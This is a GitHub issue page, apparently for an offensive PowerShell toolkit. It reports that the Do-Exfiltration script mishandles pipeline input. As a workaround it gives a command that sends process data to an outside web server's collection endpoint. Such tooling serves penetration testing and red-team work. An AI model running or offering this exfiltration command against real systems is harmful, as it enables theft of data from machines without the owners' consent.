Skip to content

Fix pipeline issue with Do-Exfiltration script and Powerpreter #19

Open
@samratashok

Description

@samratashok

Do-exfiltration is unable to handle the pipeline input properly. It exfiltrates only the last object returned from the command. Currently, the pipeline should not be used with Do-Exfiltration, instead, use as below:

Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php

Metadata

Metadata

Assignees

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions